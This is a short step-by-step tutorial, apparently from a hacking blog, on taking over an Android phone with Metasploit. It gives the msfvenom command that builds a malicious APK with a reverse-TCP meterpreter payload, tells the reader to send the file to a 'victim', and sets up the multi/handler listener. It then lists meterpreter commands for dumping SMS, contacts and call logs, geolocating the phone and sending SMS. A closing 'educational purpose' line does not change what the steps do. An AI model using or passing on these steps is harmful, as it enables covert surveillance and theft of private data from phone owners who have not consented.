1.Open Kali terminal on your PC.
2.We will be going to use “MSFVENOM” to create a malicious apk file that we will install on the android phone.
3.Paste these given commands in terminal.
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > root/itechhacks.apk
4. Change the “LHOST” to you local IP address and press enter.
5. Now open the root folder and send the techhacks.apk to the victim. (As shown in pictures)
6. Open a new terminal and enter “msfconsole.”
7. After opening Metasploit console type these following commands which are used to create payload handler which will create a connection between the victim and Kali PC.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit
8. Change the LHOST to your local IP address. Also, don’t close this terminal.
9. Wait until victim opens the file.
10. After the victim opens the file, you will get a interpreter session. Now open the MSF console terminal and use session -i 1command to access the session.
11. In the meterpreter session, you can use various commands that are given below to play different types of tricks on the victim phone like capturing a photo, screenshot, call logs,SMS logs, sending an SMS.
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information
Don’t close the msfconsole terminal.
This is only for educational purpose.